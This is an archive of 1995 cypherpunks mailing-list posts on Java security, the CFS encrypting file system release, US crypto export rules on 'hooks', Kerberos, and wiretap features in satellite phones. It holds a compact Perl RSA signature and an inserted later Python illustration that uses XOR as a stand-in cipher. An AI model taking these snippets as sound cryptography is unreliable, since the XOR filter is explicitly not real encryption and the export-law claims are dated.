can only do anything useful with them if you have the matching crypto
package.

Yours a confused Brit ... who doesn't have this problem ... yet!!

--
___________________________________________________________________

Andrew Meredith
 Senior Systems Engineer           Tel: (direct) +44(0) 1793 545377
  Network Engineering Tools Group  Tel: (main)   +44(0) 1793 541541
   Motorola ECID                   Fax:          +44(0) 1793 420915
    16, Euroway, Blagrove
     Swindon SN5 8YQ, UK       email: Andrew_Meredith@email.mot.com
___________________________________________________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Fri, 28 Jul 95 09:54:31 PDT
To: owner-cypherpunks@toad.com
Subject: Re: Java, Netscape, OpenDoc, and Babel (NewsClip)
Message-ID: <9507281654.AA07397@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>On the other hand, a Java object brokerage service sponsored by OSF

OSF has no current plans to do this.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Fri, 28 Jul 95 10:03:03 PDT
To: perry@piermont.com
Subject: Re: Java, Netscape, OpenDoc, and Babel
In-Reply-To: <9507281636.AA28295@snark.imsi.com>
Message-ID: <199507281702.NAA22816@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> I suspect that the java-like methodology of downloading small apps to
> users can be done securely, but the java model doesn't feel like the
> right way to do it, at least to me.
> 

  I agree with you. However, I think the only way to get a handle on
what the security issues are of such a methodology, is to deploy one
and see what happens. Then you can build a second generation 
environment based on that knowledge. There's also the issue that
even if the environment is secure on paper, with an application as
large as a browser and an execution environment, you can never
know if it was implemented properly. Sendmail-like bugs could haunt
the system for years. That's why it's good to deploy it early, fix all
the big holes discovered as fast as possible. At minimum though, I think
Java should at least run chroot()ed on Unix systems. Instead, their 
approach is to define a "writable" directory on disk that apps can write 
to. This does make me nervous because I can see the potential to send 
over a program to be compiled and executed. I don't know what you would do
under the MacOS and Win95 to make it secure. There is also security
at the meta-applet level. Even if you chroot() Java to some directory
where applets can write to, one applet can destroy another's data. If
the data saved by one applet is valuable to you, like hotlist settings
gathered over months, a rogue applet can trash them. But sometimes
applets need to be able to read/write each others data so you can't
just disallow it. So HotJava should have an access protocol for applets
too. The Java team could learn a lot from the experience of LambdaMOO.

-Ray



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Fri, 28 Jul 95 10:17:48 PDT
To: rjc@clark.net (Ray Cromwell)
Subject: Re: Java, Netscape, OpenDoc, and Babel
In-Reply-To: <199507281624.MAA11581@clark.net>
Message-ID: <9507281717.AA09190@leonardo.bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


Ray writes:

|   Object Oriented Superdistributed components are so useful an abstraction,
| I think it's worth the security risk. HotJava solves some fundamental
| issues with protocols. Right now the W^3 working groups have been struggling

	It's nice of you to say that.  It's nice of Perry to disagree.
Let's start using some concrete examples, so the source of
disagreements becomes obvious?

	I suspect Ray is working in an environment less security
conscious than Perry's.  Perry works on a lot of security-critical
applications where a lot of money is at stake.  If I were going to go
after financial institutions, I'd definitely look at which ones were
using Java, and see what I could upload into their systems.  Getting
copies of the recent files might be *very* informative.  I'd be
worried if I were at Salomon Brothers.

	If I were running Java at home, I'd be a lot less worried,
especially as all the interesting data on my hard drive sits on an
encrypted partition.

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Fri, 28 Jul 95 10:17:52 PDT
To: cypherpunks@toad.com
Subject: New release (v1.3) of CFS Unix encrypting file system now available
Message-ID: <9507281720.AA03779@merckx.info.att.com>
MIME-Version: 1.0
Content-Type: text/plain


Source code for the latest version (release 1.3) of CFS, the Cryptographic
File System, is now available upon request for research and experimental
use in the US and Canada.

CFS pushes encryption services into the Unix(tm) file system.  It
supports secure storage at the system level through a standard Unix
file system interface to encrypted files.  Users associate a
cryptographic key with the directories they wish to protect.  Files in
these directories (as well as their pathname components) are
transparently encrypted and decrypted with the specified key without
further user intervention; cleartext is never stored on a disk or sent
to a remote file server.  CFS employs a novel combination of DES
stream and codebook cipher modes to provide high security with good
performance on a modern workstation.  CFS can use any available file
system for its underlying storage without modification, including
remote file servers such as NFS.  System management functions, such as
file backup, work in a normal manner and without knowledge of the key.

CFS runs under SunOS and several other BSD-derived systems with NFS.
It is implemented entirely at user level, as a local NFS server
running on the client machine's "loopback" interface.  It consists of
about 5000 lines of code and supporting documentation.  You must have
"root" access to install CFS.

CFS was first mentioned at the work-in-progress session at the Winter
'93 USENIX Conference and was more fully detailed in:

    Matt Blaze. "A Cryptographic File System for Unix", Proc. 1st ACM
    Conference on Computer and Communications Security, Fairfax, VA,
    November 1993. (PostScript available by anonymous ftp from
    research.att.com in the file dist/mab/cfs.ps.)

and in

    Matt Blaze. "Key Management in an Encrypting File System", Proc.
    Summer '94 USENIX Tech. Conference, Boston, MA, June 1994.
    (PostScript available by anonymous ftp from research.att.com
    in the file dist/mab/cfskey.ps.)

Version 1.3 of CFS also includes ESM, the Encrypting Session Manager.
ESM provides shell-to-shell encrypted sessions across insecure links
and requires no OS or network support.  It is useful for typing cfs
passphrases when logged in over the network.  ESM needs RSAREF 2.0 to
compile and is tested only on SunOS and BSDI.  ESM is the first released
part of a suite of session encryption tools that are described in

    Matt Blaze and Steve Bellovin. "Session-layer Encryption."
    Proc. 1995 USENIX Security Workshop, Salt Lake City, June 1995.
    (PostScript is available from
    ftp://research.att.com/dist/mab/sesscrypt.ps)

The new version of CFS differs from the version described in the
papers in a few ways:

* The DES-based encryption scheme has been strengthened, and now
provides greater security but with the online latency of only single-DES.

* Support for the smartcard-based key management system is not
included and a few of the tools are not included.

* An improved key management scheme now allows changing the passphrase
associated with a directory.

* The performance has been improved.

* The security of the system against certain non-cryptanalytic attacks
has been improved somewhat. 

* User-contributed ports to a number of additional platforms.

* Hooks for adding new ciphers.

* 3-DES and MacGuffin encryption options.

* Timeout options allow automatic detach of encrypted directories
after a set time or period of inactivity.

CFS is distributed as a research prototype; it is COMPLETELY
UNSUPPORTED software.  No warranty of any kind is provided.  We will
not be responsible if the system deletes all your files and emails the
cleartext directly to the NSA or your mother.  Also, we do not have
the resources to port the software to other platforms, although you
are welcome to do this yourself.  The software was developed under
SunOS and BSDI, and there are also unsupported user-contributed ports
available for AIX, HP/UX, Irix, Linux, Solaris and Ultrix.  We really
can't promise to provide any technical support at all, beyond the
source code itself.  We also maintain a mailing list for CFS users and
developers; subscription information is included with the source code.

Because of export restrictions on cryptographic software, we are only
able to make the software available within the US and Canada to US and
Canadian citizens and permanent residents.  Unfortunately, we cannot
make it available for general anonymous ftp or other uncontrolled
access, nor can we allow others to do so.  Sorry.

Legal stuff from the README file:

 *              Copyright (c) 1992, 1993, 1994 by AT&T.
 * Permission to use, copy, and modify this software without fee
 * is hereby granted, provided that this entire notice is included in
 * all copies of any software which is or includes a copy or
 * modification of this software and in all copies of the supporting
 * documentation for such software.
 *
 * This software is subject to United States export controls.  You may
 * not export it, in whole or in part, or cause or allow such export,
 * through act or omission, without prior authorization from the United
 * States government and written permission from AT&T.  In particular,
 * you may not make any part of this software available for general or
 * unrestricted distribution to others, nor may you disclose this software
 * to persons other than citizens and permanent residents of the United
 * States and Canada. 
 *
 * THIS SOFTWARE IS BEING PROVIDED "AS IS", WITHOUT ANY EXPRESS OR IMPLIED
 * WARRANTY.  IN PARTICULAR, NEITHER THE AUTHORS NOR AT&T MAKE ANY
 * REPRESENTATION OR WARRANTY OF ANY KIND CONCERNING THE MERCHANTABILITY
 * OF THIS SOFTWARE OR ITS FITNESS FOR ANY PARTICULAR PURPOSE.

If you would like a copy of the CFS source code, please read to the end
of this message and then send email to:

	cfs@research.att.com

DO NOT REPLY DIRECTLY TO THIS MESSAGE.  You must include a statement
that you are in the US or Canada, are a citizen or legal permanent
resident of the US or Canada, and have read and understand the license
conditions stated above.  Be sure to include an email address in a US-
or Canada-registered domain. The code will be sent to you via email in
a "shar" shell archive (a little over 300K bytes long).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg_Rose@sibelius.sydney.sterling.com (Greg ROSE)
Date: Thu, 27 Jul 95 20:20:15 PDT
To: "Amir Y. Rosenblatt" <axon@neuron.net>
Subject: Re: NSA and the NCSA/Apache web servers
In-Reply-To: <Pine.SOL.3.91.950726103519.23445C-100000@pipe6>
Message-ID: <9507280320.AA28749@paganini.sydney.sterling.com>
MIME-Version: 1.0
Content-Type: text/plain


  
"Amir Y. Rosenblatt" <axon@neuron.net> wrote:
  Wow -- hooks to encryption are unexportable -- now THAT's bullshit.  Sheesh.

A few years ago I asked Matt Blaze if he would
publish CFS with the cryptography removed, and he
told me that AT&T's lawyers also believed this to
be true. (So, of course, his answer was "No".)
The hooks are as important as the crypto code.

Interestingly though, Kerberos made it to
Australia (Bond University I think) legally.

Greg Rose               INTERNET: greg_rose@sydney.sterling.com  
Sterling Software       VOICE:  +61-2-9975 4777    FAX:  +61-2-9975 2921
28 Rodborough Rd.       35 0A 79 7D 5E 21 8D 47  E3 53 75 66 AC FB D9 45
French's Forest         co-mod sci.crypt.research
NSW 2086 Australia.     USENIX Director.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Fri, 28 Jul 95 10:25:56 PDT
To: Adam Shostack <adam@bwh.harvard.edu>
Subject: Re: Java, Netscape, OpenDoc, and Babel
In-Reply-To: <9507281717.AA09190@leonardo.bwh.harvard.edu>
Message-ID: <9507281725.AA05535@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Adam Shostack writes:
> 	If I were running Java at home, I'd be a lot less worried,
> especially as all the interesting data on my hard drive sits on an
> encrypted partition.

Not everyone is so careful. To most people, their personal financial
information, especially if it allows embezzlement from their accounts,
is probably as valuable to them as a bank's information is to
them...

.pm





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Fri, 28 Jul 95 10:40:26 PDT
To: Phil Fraering <pgf@tyrell.net>
Subject: Re: Sat phone permit "wire"taps
In-Reply-To: <199507272254.AA06257@tyrell.net>
Message-ID: <Pine.D-G.3.91.950728133852.23404F-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 27 Jul 1995, Phil Fraering wrote:

>    From: Ted_Anderson@transarc.com
> 
>    I found these paragraphs in a recent Space News interesting.  They were
>    at the end of an article titled "Military Officials Open To Using
>                                     ^^^^^^^^^^^^^^^
>    Civilian Links" in the July 3rd issue. 
> 
> [...]
>      "Iridium, Globalstar, Inmarsat-P and Odyssey all plan to include
>    features to permit authorized eavesdropping, officials said. 
                        ^^^^^^^^^^

Did you miss this word?  While I suspect that you don't like Title III 
wiretaps, they are legal at present.  The above contemplates legal 
wiretaps on some phone service that might otherwise be outside the reach 
of legal wiretaps.

> Hmm. Anyone here ever heard of the Walkers, or the Rosenbergs?
> 
> It's a pity that the military has decided that in its zeal to listen
> in on phone calls, that national security is an expendable asset.

The military is not authorized to listen in to any phone calls they want 
to hear.  Otherwise, everyone on the list, including me, would probably 
be in some hidden military prison.

:-)  for the humor-impaired.

> It looks like the Chinese or Russian Armies won't be any better by
> the time they're occupying us, unfortunately.
> 
> (The really awful part is that what friends I have that are current
> or past U.S. military don't want to die, AFAIK).
> 
> Phil
> 

EBD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Fri, 28 Jul 95 10:54:29 PDT
To: adam@bwh.harvard.edu (Adam Shostack)
Subject: Re: Java, Netscape, OpenDoc, and Babel
In-Reply-To: <9507281717.AA09190@leonardo.bwh.harvard.edu>
Message-ID: <199507281754.NAA11499@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Ray writes:
> 
> |   Object Oriented Superdistributed components are so useful an abstraction,
> | I think it's worth the security risk. HotJava solves some fundamental
> | issues with protocols. Right now the W^3 working groups have been struggling
> 
> 	It's nice of you to say that.  It's nice of Perry to disagree.
> Let's start using some concrete examples, so the source of
> disagreements become obvious?
> 
> 	I suspect Ray is working in an environment less security
> conscious than Perry's.  Perry works on a lot of security-critical
> applications where a lot of money is at stake.  If I were going to go
> after financial institutions, I'd definitely look at which ones were
> using Java, and see what I could upload into their systems.  Getting
> copies of the recent files might be *very* informative.  I'd be
> worried if I were at Solomon brothers.

  If a business wants high security, they probably shouldn't be running
anything but mail. Even allowing users ftp access is dangerous
because someone could download a trojan horse. My college  took
the /exec function out of IRC for this very reason. If data can 
get  through a firewall by any means, DNS, mail, etc, it's possible to write
some kind of program to send stolen information on those channels. Hell,
there is a big enough problem with users bringing software from home
into work and infecting company networks with viruses.
  
  I work in an environment which is very security conscious (IBM Watson 
Research). You should see how paranoid their virus lab setup is.
And I'm frustrated by not being able to run stuff from work I run at
home because of the firewall. I probably shouldn't be running the
stuff at work anyway, but I can't pass up having access to a T1/T3
net connection on my desk. I have no problem with security, as long
as it is user friendly. If everyone had to manually run PGP from the shell
to post a message to cypherpunks, would there be many posts? 

  At home however, I have full control over my environment. I don't
avoid all potentially dangerous software, because for me, the benefits
outweigh the risks. I have never seen the source code to DOOM's
internet drivers, so I have no way of knowing if data is being stolen
or downloaded to my harddrive. I would rather choose to encrypt
the harddrive, and run the software in an alternate partition even though
this still doesn't guarantee safety. I know people who go farther such
as swapping HD's in-and-out depending on whether they are in "fun, 
experimental computer use mode", or "serious, money risking mode"
But ultimately that decision is up to me. Most of the people who will
be running HotJava are users in non-corporate environments. 

  Once you actually browse some HotJava web pages with HotJava, the
ordinary Web becomes static and boring. It's like the difference between
ftp and Netscape, or TinyMUD and LambdaMOO. There's just so much
potential, especially for crypto-clients. Because Java provides a
single development platform, single execution environment, GUI, and
network access.
 
-Ray
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kdf@gigo.com (John Erland)
Date: Fri, 28 Jul 95 14:16:03 PDT
To: cypherpunks@toad.com
Subject: Mail2news Gates
Message-ID: <1ef_9507281405@gigo.com>
MIME-Version: 1.0
Content-Type: text/plain



[Please respond via netmail - I have only intermittent access to list]

Can someone send me a list of functioning mail-2-news gates?

Suddenly, @news.demon.co.uk, which has worked well for ages, is rejecting
posts:

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=++=+=+=+=+=+=+

	Subject: Article rejected
	Date: Fri, 28 Jul 95 1:36:41 +0100
	Sender: news@dispatch.demon.co.uk

	You do not have posting privileges via this mail2news gateway.

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=++=+=+=+=+=+=+

This is troubling, as I have not found another gate that carries my regional
hierarchy.

Also, is there a method by which one can access (via netmail) a list of the
newsgroups served by a given mail-2-news gate?

Thanks for any help.
--
: Fidonet:  John Erland 1:203/8055.12  .. speaking for only myself.
: Internet: kdf@gigo.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "greg pitz" <a_friend@mail.onetouch.com>
Date: Fri, 28 Jul 95 14:47:22 PDT
To: postmaster@censored.org
Subject: Re: carol....
Message-ID: <9507282147.AA08308@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> In general, it isn't necessary to CC the world on your first interaction
> with a customer service department; perhaps if you had sent us several
> messages and we hadn't answered you, this would have been an appropriate
> response.  As it is, the situation is almost certainly either a human

Sigh, but you haven't had the pleasure of getting to know Carol & her 
ways as we have.....
 

.................................
pitz@onetouch.com
greg pitz                 ..






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Andrew D Meredith" <meredith@ecid.cig.mot.com>
Date: Fri, 28 Jul 95 06:52:17 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: Hooks to Crypto>
In-Reply-To: <9507281300.AA22773@all.net>
Message-ID: <9507281450.ZM15992@jurua.sweng.ecid.cig.mot.com>
MIME-Version: 1.0
Content-Type: text/plain


On Jul 28,  2:09pm, Dr. Frederick B. Cohen wrote:
> Subject: Re: Hooks to Crypto>
> ...
> > > Actually, neither hooks nor encryption are unexportable, you
> > > just need a license to export them.
> ...
>
> > I hope I'm not alone in wondering why on earth this is the case.
>
> They don't want to encourage encryption if they can avoid it.  It
> impairs their ability to gather intelligence.

I kind of meant "why they think they can" rather than "why they want
to". One can't really help being aware these days what the US
government (and indeed many others) are trying to do.

> Legal? What makes you think so? It hasn't made it to the courts yet

Oh ... I see ... just like the rest of this stuff, only more so.

> because people in the US aren't willing to risk jail for over their
> right to do it.  The only court case I am aware of was the RSA case
> and in that one, the courts ruled against the NSA - but in today's
> political and economic environment, people who do cryptography
> don't want to risk it.

Judging by the PZ case, I can't say as I can really blame them. It
would be better of course if they would go for it, but ...

> > The hooks are of course completely useless in and of themselves.
> > You can only do anything useful with them if you have the
> > matching crypto package.
>
> Not really right.  It's very easy to change a compression hook
> into an encryption hook using standard off-the-shelf shareware,
> public domain software, or commercial products.

I probably should have written "a crypto package" instead of "the
matching crypto package".

This would infer that anything that can cause information to be piped
out to a package and then the result sucked back in would fall into
this category.

Hmmm

map ^Xe :,$! /bin/sh -c 'pgp -feast 2>/dev/tty^V|^V|sleep 4'^M^L

Everyone DELETE VI NOW !!! >;)

> > Yours a confused Brit ... who doesn't have this problem ... yet!!
>
> Don't bet on it.  If you really try to export top-flight encryption
> technology in a big way, you may find that your government can be
> just as oppressive as mine.

Our lot tend to work in a different way to yours. Similar end result
of course, but different approach.

So when I said "yet". I was meaning that, at the moment, we have no
laws specifically referring to Cryptography and its export, but the
approach I can see being taken would be:

1 - Find yourself a tenuous link with some Psycho-Baby-Killer group.
2 - Start a "This must be stopped" campaign.
3 - Propose the "Internet Pornography Act"
4 - Shove it through before anyone can get together enough
    opposition to get it squashed. (and that would have to be a
    GREAT DEAL of opposition).

That's how they did the "Criminal Justice Act" which breaks both
European and International law in a great many places. That's how
they'll do the "Internet Pornography Act". It'll be just loose enough
to include just about anything they want it to.

>-- End of excerpt from Dr. Frederick B. Cohen


Andy M
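
The point argued in this exchange, that a hook which pipes data out to an external program and reads the result back is indifferent to what that program does, as an added example (not part of the original message). The `Editor` class, the filter command lines and the key are constructed for illustration, and the XOR filter is only a stand-in for "a crypto package", not real encryption.

```python
import subprocess
import sys


def _py_filter(body, *args):
    """Command line for a stdin-to-stdout filter program (constructed here)."""
    script = (
        "import sys, zlib\n"
        "d = sys.stdin.buffer.read()\n"
        + body + "\n"
        "sys.stdout.buffer.write(d)\n"
    )
    return [sys.executable, "-c", script, *args]


# Two external filters with the same calling convention.
COMPRESS = _py_filter("d = zlib.compress(d)")
DECOMPRESS = _py_filter("d = zlib.decompress(d)")
# Stand-in for a crypto package: repeating-key XOR (NOT real encryption).
# XOR is its own inverse, so the same command serves both directions.
SCRAMBLE = _py_filter(
    "k = sys.argv[1].encode()\n"
    "d = bytes(b ^ k[i % len(k)] for i, b in enumerate(d))",
    "constructed-key",
)


def run_hook(command, data):
    """The hook itself: pipe bytes to an external program, read the result."""
    done = subprocess.run(command, input=data, stdout=subprocess.PIPE, check=True)
    return done.stdout


class Editor:
    """Hypothetical host application. It ships no compression and no crypto;
    it only knows that it has an outbound and an inbound filter command."""

    def __init__(self, outbound, inbound):
        self.outbound = outbound
        self.inbound = inbound

    def save(self, text):
        return run_hook(self.outbound, text.encode())

    def load(self, stored):
        return run_hook(self.inbound, stored).decode()


def round_trip(editor, text):
    """Return (bytes as stored, text as read back) for one save/load cycle."""
    stored = editor.save(text)
    return stored, editor.load(stored)


if __name__ == "__main__":
    sample = "meet at the usual place " * 4      # constructed sample text
    for name, editor in (("compression hook", Editor(COMPRESS, DECOMPRESS)),
                         ("same hook, other filter", Editor(SCRAMBLE, SCRAMBLE))):
        stored, back = round_trip(editor, sample)
        print(name, len(stored), "bytes stored, intact:", back == sample)
```

Nothing in `Editor` or `run_hook` changes between the two configurations; only the command line handed to the hook does.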




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wolfgang Roeckelein <wolfgang@wi.WHU-Koblenz.de>
Date: Fri, 28 Jul 95 06:04:28 PDT
To: Greg Broiles <greg@ideath.goldenbear.com>
Subject: Re: copyrighting algorithms
Message-ID: <9507281303.AA08172@sirius.wi.WHU-Koblenz.de>
MIME-Version: 1.0
Content-Type: text/plain


Hi,

>Wolfgang Roeckelein writes:
>> No, I was referring to a case, where a third party game cartridges
>> manufacturer reverse engineered the specifications of the game
>> cartridges slot for producing his own cartridges for this game.
>
>Sounds like _Sega v. Accolade_, 977 F.2d 1510 (9th Cir., 1993). 

>I don't have it in front of me, but Terry Carroll's Copyright FAQ
>(ftp://rtfm.mit.edu/pub/usenet/news.answers/law/copyright/faq/part2)
>cites it for the proposition that disassembly of a copyrighted work
>can be fair use if there is no other way to reach noncopyrightable
>(functional, not expressive) elements of an existing work. 



Yes, thank you for pointing this out. I'm glad that I was right with Sega...

  Wolfgang
---
Dipl.-Wirtsch.-Inf.	Voice:	+49 261 6509 173
Wolfgang Roeckelein	Fax:	+49 261 6509 179
WHU Koblenz		E-Mail:	roeckelein@wi.whu-koblenz.de
Burgplatz 2			(NeXTmail ok)
D-56179 Vallendar	WWW:	http://www.whu-koblenz.de/~wolfgang/
Germany
--rsa--------------------------------8<-------------------------------------
#!/usr/local/bin/perl -s-- -export-a-crypto-system-sig -RSA-in-3-lines-PERL
($k,$n)=@ARGV;$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%
Sa2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print pack('H*'
,$_)while read(STDIN,$m,($w=2*$d-1+length($n||die"$0 [-d] k n\n")&~1)/2)
-------------------------------------8<-------------------------------------
TRY: echo squeamish ossifrage | rsa -e 3 7537d365 | rsa -d 4e243e33 7537d365
Residents of the USA & France *MUST NOT* include this .sig if following up!
*** Residents of France & Russia *MUST NOT* make any use of this -sig !  ***




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Fri, 28 Jul 95 13:07:53 PDT
To: perry@piermont.com
Subject: Java, Netscape, OpenDoc, and Babel
In-Reply-To: <9507281410.AA07271@snark.imsi.com>
Message-ID: <199507282003.AA24860@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


   Reply-To: perry@piermont.com
   X-Reposting-Policy: redistribute only with permission
   Date: Fri, 28 Jul 1995 10:10:59 -0400
   From: "Perry E. Metzger" <perry@imsi.com>
...
   I exaggerate only slightly. I don't believe Java to be secure, in spite
   of the claims. It's too complicated, and it operates in an environment
   whose correct operation is required for it to remain secure. Good
   system design says that you want a system's failure mode to produce a
   secure result, but that's not what Java does.

   Perry

How would you make Java secure or create a secure Javalike language?
(Secure to your satisfaction, of course).

I don't even play a security consultant on TV, but would removing hooks
into X-windows (if it has them; I don't know if it does, although Ray
mentioned something about how it could open multiple windows with graphics
in them, I think) be a good start?

What sort of interface does it have to the filesystem? I would guess that
a secure language would have its own filesystem mapped to a file of fixed
size in the normal filesystem, so that it couldn't cause disaster by
filling your hard disk.

Does it have that?

Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@mincom.oz.au>
Date: Thu, 27 Jul 95 22:31:47 PDT
To: Greg ROSE <Greg_Rose@sibelius.sydney.sterling.com>
Subject: Re: NSA and the NCSA/Apache web servers
In-Reply-To: <9507280320.AA28749@paganini.sydney.sterling.com>
Message-ID: <Pine.HPP.3.91.950728144445.1176D-100000@saturn.mincom.oz.au>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 28 Jul 1995, Greg ROSE wrote:
> A few years ago I asked Matt Blaze if he would
> publish CFS with the cryptography removed, and he
> told me that AT&T's lawyers also believed this to
> be true. (So, of course, his answer was "No".)
> The hooks are as important as the crypto code.
> 
> Interestingly though, Kerberos made it to
> Australia (Bond University I think) legally.

I was the person who put the encryption back into that version of 
kerberos (which is now called eBones).  They removed all encryption calls.

They had actually pulled out all calls to the des routines, so we had a 
'working' authentication system that encrypted nothing.
This version was called Bones (they ran a program called parania over 
Kerberos, and that left Bones :-).  When I left, we had Kerberos working 
but I had not tested against 'true' kerberos.  I believe it has been fixed 
by 'those that have followed' and now fully interoperates with MIT 
kerberos v4.  So the 'international' version of kerberos is fully legal.

BTW I wrote libdes (my DES library) as part of this work.  Luckily I have 
    escaped from Kerberos/eBones when I left Bond Uni but my nights are
    still haunted with memories of trying to follow the code :-).

eric (who is having far more fun putting an SSL package together :-)
--
Eric Young                  | Signature removed since it was generating
AARNet: eay@mincom.oz.au    | more followups than the message contents :-)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Fri, 28 Jul 95 13:24:37 PDT
To: bdavis@thepoint.net
Subject: Sat phone permit "wire"taps
In-Reply-To: <Pine.D-G.3.91.950728133852.23404F-100000@dg.thepoint.net>
Message-ID: <199507282019.AA27619@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


   Date: Fri, 28 Jul 1995 13:42:46 -0400 (EDT)
   From: Brian Davis <bdavis@thepoint.net>
   Mime-Version: 1.0
   Content-Type: TEXT/PLAIN; charset=US-ASCII

   On Thu, 27 Jul 1995, Phil Fraering wrote:

   >    From: Ted_Anderson@transarc.com
   > 
   >    I found these paragraphs in a recent Space News interesting.  They were
   >    at the end of an article titled "Military Officials Open To Using
   >                                     ^^^^^^^^^^^^^^^
   >    Civilian Links" in the July 3rd issue. 
   > 
   > [...]
   >      "Iridium, Globalstar, Inmarsat-P and Odyssey all plan to include
   >    features to permit authorized eavesdropping, officials said. 
			   ^^^^^^^^^^

   Did you miss this word?  While I suspect that you don't like Title III 
   wiretaps, they are legal at present.  The above contemplates legal 
   wiretaps on some phone service that might otherwise be outside the reach 
   of legal wiretaps.

You misunderstand. With public key encryption, the proliferation of processor
power and bandwidth, and their funding, there is NO reason whatsoever for the
MILITARY to use an intentionally WEAK encryption system.

   > Hmm. Anyone here ever heard of the Walkers, or the Rosenbergs?
   > 
   > It's a pity that the military has decided that in its zeal to listen
   > in on phone calls, that national security is an expendable asset.

   The military is not authorized to listen in to any phone calls they want 
   to hear.  Otherwise, everyone on the list, including me, would probably 
   be in some hidden military prison.

   :-)  for the humor-impaired.


I think you misunderstood: if we want a military in the first place
(yes, I realize that's an open question to many people on this list)
it needs to have as much of its communications encrypted as possible.
Without back doors or intentionally weakened algorithms. Otherwise
we're just stuck with a standard conventional force that isn't _that_
great compared to the combined assets of a reasonable assembly of
enemy forces.

I would go even farther: since so many of the troops sent over to the Gulf
in the war there went with K-Mart-purchased GPS receivers that the military
had to turn off selective availability, I am willing to bet that in future
conflicts the U.S. soldier's ability to have secure communications (with
no backdoors or weakened algorithms) is dependent on civilians having access
to the same technology. Because the only way they might have it is if Ma
and Pa go down to the local K-Mart and buy one for their son/daughter about
to go overseas.

(I could add some stuff about GPS vs. Geostar, but I figured I've wasted
enough bandwidth already).

Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 28 Jul 95 06:36:32 PDT
To: cypherpunks@toad.com
Subject: Re: Java, Netscape, OpenDoc, and Babel (NewsClip)
Message-ID: <199507281335.PAA27686@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by merriman@arn.net (David K. Merriman) on 
Fri, 28 Jul  3:24 AM


>Still tentative, or is there a Web address?


The mall will be accessible July 31 from a pointer at 
http://www.org.com .


----------


OSF Opens Software Web Mall For Java


Cambridge, MA, July 26 (NB) -- In a teleconference today, the Open
Software Foundation (OSF) unveiled plans to open an Open Software Mall
on the Web on July 31, and to start distributing software there this
fall that will include Java Ports technology for the Web, DCE
(Distributed Computing Environment) Web, and Microkernel Unification
Specification, a new technology for building cross-platform
applications.

At the teleconference, which was attended by Newsbytes, Dr. Ira
Goldstein, chief scientist and executive VP, said that the OSF sees
the Open Software Mall as a place for users to access and help to
beta test new technologies like Java Ports, DCE Web, and Microkernel
Unification -- being sponsored by the OSF in conjunction with major
vendors -- as well as software from universities and other research
collaborators, and eventually, outside "open systems" efforts that are
"germane to core OSF technology."

Java Ports, a series of ports of Sun's Java technology for the Web,
is being produced by the OSF with Sun, Hewlett-Packard, and Novell,
Goldstein told the journalists and analysts. The technology will be
available on the Open Software Mall in September, he added.

DCE Web, an application designed to provide the Web with DCE
mechanism for encryption, access control, and naming, is a
collaborative project from the OSF, Hitachi, HP and AT&T.

DCE Web is "consistent with HTTP and secure HTTP," but able to
provide additional services to DCE sites, according to Goldstein.

Microkernel Unification -- from the OSF, Hitachi, HP and IBM -- is
a technology for building cross-platform databases and other
applications by writing directly to a standard, common microkernel
application programming interface (API).

IBM plans to produce a product that is "mostly compliant" with the
new specification in the product's first release, and "completely
compliant" in its second release, Goldstein noted.

Digital Equipment Corp. might also be participating in the
Microkernel Unification specification project, Goldstein reported,
adding that he expects to have an answer on this from Digital
within a week.

>From the OSF's Open Software Mall, users will be able to browse,
download, and comment on software executables and software,
documentation plans, design documentation, specifications, and
commentary in hypertext format, according to Goldstein.

The Web mall will also provide Web links to "relevant products,
services, education and consulting available from the community,"
he told the teleconference participants.

Java, DCE Web, and Microkernel Unification will each have their own
Web stores on the Open Software Mall's ATO (Advanced Technology
Offering) Plaza.

ATOs are software technology projects, which may or may not lead
to productization, where participants seek to minimize risk by
obtaining feedback from users, noted the OSF's Peter Shaw. ATO
